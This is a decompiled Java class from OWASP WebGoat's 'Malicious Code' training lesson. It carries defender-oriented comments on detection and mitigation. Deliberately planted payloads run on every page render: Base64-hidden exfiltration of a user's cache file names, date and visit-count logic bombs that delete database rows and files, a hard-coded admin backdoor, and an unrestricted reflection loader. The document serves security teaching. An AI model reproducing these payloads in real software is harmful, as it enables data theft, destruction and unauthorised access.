package org.owasp.webgoat.plugin;

import com.sun.jna.platform.win32.WinError;
import java.io.BufferedReader;
import java.io.File;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.io.Writer;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.URLConnection;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Calendar;
import java.util.List;
import java.util.StringTokenizer;
import javax.tools.DiagnosticListener;
import javax.tools.JavaFileManager;
import javax.tools.JavaFileObject;
import javax.tools.ToolProvider;
import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.Input;
import org.owasp.webgoat.lessons.Category;
import org.owasp.webgoat.lessons.LessonAdapter;
import org.owasp.webgoat.session.ECSFactory;
import org.owasp.webgoat.session.LessonTracker;
import org.owasp.webgoat.session.WebSession;
import sun.misc.BASE64Decoder;

/* loaded from: input_file:WebGoat.war:plugin_lessons/blind-script-1.0.jar:org/owasp/webgoat/plugin/BlindScript.class */
/**
 * WebGoat "Malicious Code" lesson: a deliberately booby-trapped lesson class that shows what
 * hostile code hidden inside a trusted plugin can look like. Besides the visible name form,
 * every render of the page silently runs four hidden payloads (data exfiltration, a date-based
 * logic bomb, a visit-count logic bomb and a hard-coded admin backdoor) and exposes a
 * reflection loader driven entirely by request parameters.
 *
 * <p>This listing is decompiler output (see the "loaded from" comment above), so some constants
 * and casts are artifacts of the decompiler rather than of the original source.
 *
 * <p>The documentation below is written from the defender's side: what each payload does, what
 * would reveal it in code review or at runtime, and what would contain it. The defects noted in
 * the payload methods are recorded for the reader, not as things to repair.
 */
public class BlindScript extends LessonAdapter {
    // Request-parameter names used by createContent/loadMe. createContent reads "code", "method"
    // and "params" as string literals instead of these constants, so a rename here would be
    // silently ignored there.
    private static final String PERSON = "person";
    private static final String CODE = "code";
    private static final String METHOD = "method";
    private static final String ARG_TYPES = "argTypes";
    private static final String PARAMS = "params";
    // Base64-obfuscated exfiltration target, decoded at runtime in executeSpyWare. It decodes to
    // http://localhost/WebGoat/catcher?PROPERTY=yes. The only effect of the encoding is to hide
    // the URL from a plain-text search of the code base; Base64 decoding applied to a string
    // constant is the corresponding review signal.
    private static final String WEBGOAT_URL = "aHR0cDovL2xvY2FsaG9zdC9XZWJHb2F0L2NhdGNoZXI/UFJPUEVSVFk9eWVz";
    // Boxed constructor is deprecated since Java 9; Integer.valueOf(10) is the modern spelling.
    private static final Integer DEFAULT_RANKING = new Integer(10);

    /* JADX INFO: Access modifiers changed from: protected */
    /**
     * Renders the lesson page and, as a side effect of every render, runs all hidden payloads.
     *
     * <p>Visible behaviour: reads the {@code person} parameter, echoes it back in a "could not
     * locate record" message, and re-renders the name form. Entering {@code BrucE} swaps the page
     * for {@link #easterEgg} and marks the lesson solved.
     *
     * <p>Hidden behaviour, independent of the input: {@link #executeSpyWare},
     * {@link #executeTimeTrigger}, {@link #executeEventTrigger} and {@link #executeBackDoor} run
     * on every request, and if a {@code code} parameter is present {@link #loadMe} is called with
     * the request-supplied class, method and argument strings.
     *
     * <p>Defects visible in this method: the {@code person} value is placed into the page without
     * any visible output encoding (whether ECS {@code StringElement} escapes it is not shown
     * here); if {@code webSession.getParser()} throws, {@code stringBuffer} is still {@code null}
     * at the {@code "BrucE"} check and the method ends in a NullPointerException; the
     * {@code IOException} catch around {@link #loadMe} is empty, and {@link #loadMe} already
     * swallows every exception itself, so loader failures are never reported to the caller.
     *
     * @param webSession the current WebGoat session; request parameters are read from its parser
     * @return the page content, or the easter-egg content for the {@code BrucE} input
     */
    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.session.Screen
    public Element createContent(WebSession webSession) {
        ElementContainer elementContainer = new ElementContainer();
        StringBuffer stringBuffer = null;
        try {
            stringBuffer = new StringBuffer(webSession.getParser().getStringParameter(PERSON, ""));
            if (!"".equals(stringBuffer.toString())) {
                // Reflects the raw parameter back into the page; no encoding is visible here.
                elementContainer.addElement(new StringElement("Sorry.  Could not locate record for: " + stringBuffer.toString()));
            }
            elementContainer.addElement(new StringElement("Enter your name: "));
            elementContainer.addElement(new Input("TEXT", PERSON, stringBuffer.toString()));
            elementContainer.addElement(ECSFactory.makeButton("Go!"));
        } catch (Exception e) {
            // Catch-all with a generic message; the stack trace goes to stdout, not the app log.
            webSession.setMessage("Error generating " + getClass().getName());
            e.printStackTrace();
        }
        // NullPointerException if the try block failed before stringBuffer was assigned.
        if ("BrucE".equals(stringBuffer.toString())) {
            elementContainer = easterEgg(webSession);
            makeSuccess(webSession);
        }
        // Hidden payloads: run on every render, regardless of the submitted name.
        executeSpyWare(webSession);
        executeTimeTrigger(webSession);
        executeEventTrigger(webSession);
        executeBackDoor(webSession);
        // String literals instead of the CODE/METHOD/PARAMS constants declared above.
        String stringParameter = webSession.getParser().getStringParameter("code", "");
        String stringParameter2 = webSession.getParser().getStringParameter("method", "");
        String stringParameter3 = webSession.getParser().getStringParameter(ARG_TYPES, "");
        String stringParameter4 = webSession.getParser().getStringParameter("params", "");
        if (!stringParameter.equals("")) {
            try {
                loadMe(webSession, stringParameter, stringParameter2, stringParameter3, stringParameter4);
            } catch (IOException e2) {
                // Empty catch; loadMe catches everything internally, so this branch is dead.
            }
        }
        return elementContainer;
    }

    /**
     * Hard-coded credential backdoor: submitting the magic value {@code B_Admin443} as the
     * {@code person} parameter promotes the current session to admin without any authentication.
     *
     * <p>Detection: a string constant compared against request input and immediately followed by
     * a privilege change is a classic review signal; at runtime, an admin flag being raised by a
     * request to a lesson page rather than a login endpoint is the anomaly to alert on.
     * Mitigation: privilege must be derived from the authenticated principal only, never from
     * lesson input.
     *
     * @param webSession session whose admin flag is raised when the magic value is submitted
     */
    private void executeBackDoor(WebSession webSession) {
        if ("B_Admin443".equals(webSession.getParser().getStringParameter(PERSON, ""))) {
            webSession.setAdmin(true);
        }
    }

    /**
     * Data-exfiltration payload: lists the file names in the Windows "Temporary Internet Files"
     * directory under {@code user.home} and sends them, newline-separated, to the Base64-hidden
     * {@link #WEBGOAT_URL} endpoint. On hosts where that directory does not exist an empty list
     * is still sent.
     *
     * <p>Details worth noting for review: the URL is only decoded at runtime (obfuscation);
     * {@code setDoOutput(true)} turns the connection into a write, i.e. a POST for an HTTP
     * connection; the body {@code "&cache=..."} is sent without URL-encoding; the response is
     * read and discarded; and the catch-all swallows every failure so the payload never shows up
     * in logs. The writer and reader are not closed if an exception occurs before the explicit
     * close calls (no try-with-resources), leaking the connection.
     *
     * <p>Detection: outbound connections from a web application to a host that appears nowhere in
     * plain text in the code base, and file-system enumeration of a user profile from a servlet
     * context, are both strong indicators. Egress filtering and a least-privilege service account
     * with no access to user profiles are the containing controls.
     *
     * @param webSession unused; present only so the method matches its siblings
     */
    public void executeSpyWare(WebSession webSession) {
        String str = System.getProperty("user.home") + "\\Local Settings\\Temporary Internet Files";
        String property = System.getProperty("line.separator");
        File file = new File(str);
        StringBuffer stringBuffer = new StringBuffer();
        if (file.isDirectory()) {
            for (File file2 : file.listFiles()) {
                stringBuffer.append(file2.getName());
                stringBuffer.append(property);
            }
        }
        try {
            // Target URL is hidden behind Base64 and only materialises here.
            URLConnection openConnection = new URL(new String(new BASE64Decoder().decodeBuffer(WEBGOAT_URL))).openConnection();
            openConnection.setDoOutput(true);
            OutputStreamWriter outputStreamWriter = new OutputStreamWriter(openConnection.getOutputStream());
            outputStreamWriter.write("&cache=" + stringBuffer.toString());
            outputStreamWriter.flush();
            BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(openConnection.getInputStream()));
            // Drain the response so the request completes; the content is never used.
            do {
            } while (bufferedReader.readLine() != null);
            outputStreamWriter.close();
            bufferedReader.close();
        } catch (Exception e) {
            // Silently swallowed: a failed exfiltration leaves no trace in the application log.
        }
    }

    /**
     * Visit-count logic bomb: once the lesson has been viewed more than 100 times, deletes every
     * entry directly inside the user's WebGoat directory (non-recursively; a non-empty
     * subdirectory simply fails {@code File.delete()} and is left in place).
     *
     * <p>{@code File.delete()} return values are ignored, and {@code file.list()} can return
     * {@code null} on an I/O error even after {@code isDirectory()} succeeded, which would end in a
     * NullPointerException. Detection: destructive file operations keyed on a counter or a date
     * with no business justification. Mitigation: run the application under an account that
     * cannot delete its own data directory.
     *
     * @param webSession used to reach the lesson tracker and locate the per-user directory
     */
    private void executeEventTrigger(WebSession webSession) {
        if (getLessonTracker(webSession).getNumVisits() > 100) {
            File file = new File(LessonTracker.getUserDir(webSession));
            if (file.isDirectory()) {
                for (String str : file.list()) {
                    new File(file, str).delete();
                }
            }
        }
    }

    /**
     * Date-based logic bomb: once the current time is past a fixed date, issues
     * {@code DELETE employee} against the lesson database.
     *
     * <p>{@code WinError.ERROR_INVALID_CMM} is almost certainly a decompiler substitution of a
     * same-valued numeric literal (the constant is 2010 in WinError.h, which would make the trigger
     * date 13 February 2010 since {@code Calendar} months are 0-based); the JNA import it drags in
     * is therefore spurious and should not be read as a real dependency — confirm against the
     * original source. The statement is run with {@code executeQuery}, which many JDBC drivers
     * reject for a DELETE, and the catch-all hides whether it ever succeeded. The magic numbers
     * 1004 and 1008 are the values of {@code ResultSet.TYPE_SCROLL_INSENSITIVE} and
     * {@code ResultSet.CONCUR_UPDATABLE}.
     *
     * <p>Detection: SQL DML guarded by a time condition unrelated to business logic. Mitigation:
     * the lesson's database account should not hold DELETE on {@code employee} at all.
     *
     * @param webSession provides the JDBC connection
     */
    private void executeTimeTrigger(WebSession webSession) {
        Calendar calendar = Calendar.getInstance();
        Calendar calendar2 = Calendar.getInstance();
        // Decompiler artifact: a JNA error-code constant standing in for a numeric year.
        calendar2.set(WinError.ERROR_INVALID_CMM, 1, 13);
        if (calendar.getTime().after(calendar2.getTime())) {
            try {
                WebSession.getConnection(webSession).prepareStatement("DELETE employee", 1004, 1008).executeQuery();
            } catch (Exception e) {
                // Silently swallowed; success or failure of the DELETE is never recorded.
            }
        }
    }

    /**
     * Request-driven reflection loader: resolves a class by the caller-supplied name and invokes a
     * public method on it by name, with the parameter types taken from a comma-separated list.
     * There is no allow-list, so any loadable class and any public static method are reachable;
     * this is the most dangerous thing in the file and is exposed through {@link #createContent}.
     *
     * <p>As written it is also broken in ways a reviewer should record rather than repair: every
     * type token writes index {@code 0} of {@code clsArr}, so only the first parameter type is
     * ever set and the remaining slots stay {@code null}; the {@code params} tokens
     * ({@code stringTokenizer2}) are counted but never consumed, so {@code objArr} holds
     * {@code null}s except for the {@code W} case, which stores the session; the {@code W} case
     * throws NullPointerException when {@code params} was empty ({@code objArr} is then
     * {@code null}); the receiver passed to {@code invoke} is the {@code Class} object itself,
     * which only works for static methods; and the catch-all prints the stack trace and returns
     * {@code null}, so {@code IOException} is never actually thrown despite the signature.
     *
     * <p>Mitigation: reflection driven by request input should be replaced by an explicit
     * dispatch table of permitted operations. Detection: {@code Class.forName} or
     * {@code getMethod} whose arguments trace back to request parameters.
     *
     * @param webSession session passed as the argument when the type token is {@code W}
     * @param str fully qualified name of the class to load
     * @param str2 name of the method to invoke
     * @param str3 comma-separated type tokens: {@code W} (WebSession), {@code S} (String),
     *             {@code I} (Integer); anything else leaves the slot {@code null}
     * @param str4 comma-separated parameter values; only counted, never read
     * @return the invocation result cast to String, or {@code null} on any failure
     * @throws IOException declared but never thrown; every exception is caught internally
     */
    public static String loadMe(WebSession webSession, String str, String str2, String str3, String str4) throws IOException {
        try {
            // Class name comes straight from the request; no allow-list.
            Class<?> cls = Class.forName(str);
            StringTokenizer stringTokenizer = new StringTokenizer(str3, ",");
            StringTokenizer stringTokenizer2 = new StringTokenizer(str4, ",");
            Class<?>[] clsArr = null;
            Object[] objArr = null;
            if (stringTokenizer.countTokens() >= 1) {
                clsArr = new Class[stringTokenizer.countTokens()];
            }
            if (stringTokenizer2.countTokens() >= 1) {
                objArr = new Object[stringTokenizer2.countTokens()];
            }
            // Every iteration writes slot 0; slots beyond the first are never filled.
            while (stringTokenizer.hasMoreTokens()) {
                String nextToken = stringTokenizer.nextToken();
                if ("W".equals(nextToken)) {
                    clsArr[0] = WebSession.class;
                    objArr[0] = webSession;
                } else if ("S".equals(nextToken)) {
                    clsArr[0] = String.class;
                } else if ("I".equals(nextToken)) {
                    clsArr[0] = Integer.class;
                }
            }
            // Receiver is the Class object, so only static methods can succeed here.
            return (String) cls.getMethod(str2, clsArr).invoke(cls, objArr);
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }

    /**
     * Builds the page shown when the lesson is solved with the {@code BrucE} input.
     *
     * @param webSession unused
     * @return a container holding the congratulation text
     */
    private ElementContainer easterEgg(WebSession webSession) {
        ElementContainer elementContainer = new ElementContainer();
        elementContainer.addElement(new StringElement("Bruce - You are the greatest!"));
        return elementContainer;
    }

    /**
     * Returns the lesson hints shown to the student. Uses a raw {@code ArrayList} although the
     * declared return type is {@code List<String>}; a decompiler artifact rather than intent.
     *
     * @param webSession unused
     * @return the three hint strings, in display order
     */
    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson
    public List<String> getHints(WebSession webSession) {
        ArrayList arrayList = new ArrayList();
        arrayList.add("Type in Bruce and press 'go'");
        arrayList.add("");
        arrayList.add("Press the Show Lesson Plan button to view a lesson summary");
        return arrayList;
    }

    /**
     * Position of this lesson within its category.
     *
     * @return the fixed ranking {@link #DEFAULT_RANKING}
     */
    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson
    protected Integer getDefaultRanking() {
        return DEFAULT_RANKING;
    }

    /**
     * Category under which the lesson is listed.
     *
     * @return {@code Category.GENERAL}
     */
    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson
    protected Category getDefaultCategory() {
        return Category.GENERAL;
    }

    /**
     * Title shown in the lesson menu.
     *
     * @return the literal "Malicious Code"
     */
    @Override // org.owasp.webgoat.lessons.LessonAdapter, org.owasp.webgoat.lessons.AbstractLesson, org.owasp.webgoat.session.Screen
    public String getTitle() {
        return "Malicious Code";
    }

    /**
     * Compiles the given in-memory sources with the platform compiler, using the default file
     * manager and sending diagnostics to stderr (every optional task argument is {@code null}).
     *
     * <p>{@code ToolProvider.getSystemJavaCompiler()} returns {@code null} on a runtime without a
     * compiler, which would make this throw NullPointerException; the raw {@code Iterable} casts
     * are decompiler artifacts. Runtime compilation inside a web application is itself a review
     * red flag: anything produced this way escapes every static check done on the shipped jar.
     *
     * @param javaFileObjectArr sources to compile
     * @return {@code true} if compilation succeeded
     */
    private static boolean compile(JavaFileObject... javaFileObjectArr) {
        return ToolProvider.getSystemJavaCompiler().getTask((Writer) null, (JavaFileManager) null, (DiagnosticListener) null, (Iterable) null, (Iterable) null, Arrays.asList(javaFileObjectArr)).call().booleanValue();
    }

    /**
     * Builds the source text of a {@code Deleter} class whose static initializer deletes a fixed
     * file ({@code user.txt} under the Windows {@code C:} temp directory) the moment the class is
     * loaded — the "payload in a class initializer" pattern, invisible to anyone who only looks at
     * the methods of the compiled plugin.
     *
     * <p>The path is written into the generated source with single backslashes, so the generated
     * file contains a backslash-t (a tab) and a backslash-u immediately followed by {@code ser.txt},
     * which is an illegal Unicode escape; the generated class should therefore fail to compile and
     * {@link #StaticDeleter} never reaches its payload. The generated class also sits in package
     * {@code org.owasp.webgoat.plugin}, while {@link #StaticDeleter} looks it up under
     * {@code org.owasp.webgoat.lessons}.
     *
     * @return Java source for the {@code Deleter} class
     */
    private static String compose() {
        StringBuilder sb = new StringBuilder(1000);
        sb.append("package org.owasp.webgoat.plugin;\n");
        sb.append("import java.io.File;\n");
        sb.append("public class Deleter\n");
        sb.append("{\n");
        sb.append("static {\n");
        // Single backslashes survive into the generated source; see the Javadoc above.
        sb.append("File foo = new File(\"C:\\temp\\user.txt\");\n");
        sb.append("foo.delete();\n");
        sb.append("  }\n");
        sb.append("}\n");
        return sb.toString();
    }

    /**
     * Runtime-compiles and loads the {@link #compose} payload class so that its static initializer
     * runs. Nothing in this file calls it; whether the framework invokes it reflectively is not
     * visible here.
     *
     * <p>As written it cannot reach the payload: {@link #compile}'s result is ignored, and the
     * class is looked up as {@code org.owasp.webgoat.lessons.Deleter} whereas {@link #compose}
     * declares package {@code org.owasp.webgoat.plugin}, so the {@code ClassNotFoundException}
     * path is the one taken — and every catch block is empty, so the failure is invisible. The
     * method name breaks the lowerCamelCase convention, {@code newInstance()} is deprecated since
     * Java 9, and the {@code URISyntaxException} catch only compiles because
     * {@code ResidentJavaFileObject} (defined outside this file) presumably declares it.
     *
     * <p>Detection: build-time scanning for {@code ToolProvider}/{@code JavaCompiler} usage in
     * application code. Mitigation: a class-loading policy that trusts only signed, pre-built
     * classes, so code generated at runtime cannot be loaded at all.
     */
    public static void StaticDeleter() {
        try {
            // Return value ignored; a failed compile is indistinguishable from success here.
            compile(new ResidentJavaFileObject("Deleter", compose()));
            // Package does not match the one compose() generates.
            Class.forName("org.owasp.webgoat.lessons.Deleter").newInstance();
        } catch (ClassNotFoundException e) {
            // Swallowed; this is the branch actually taken given the package mismatch.
        } catch (IllegalAccessException e2) {
            // Swallowed.
        } catch (InstantiationException e3) {
            // Swallowed.
        } catch (URISyntaxException e4) {
            // Swallowed.
        }
    }
}
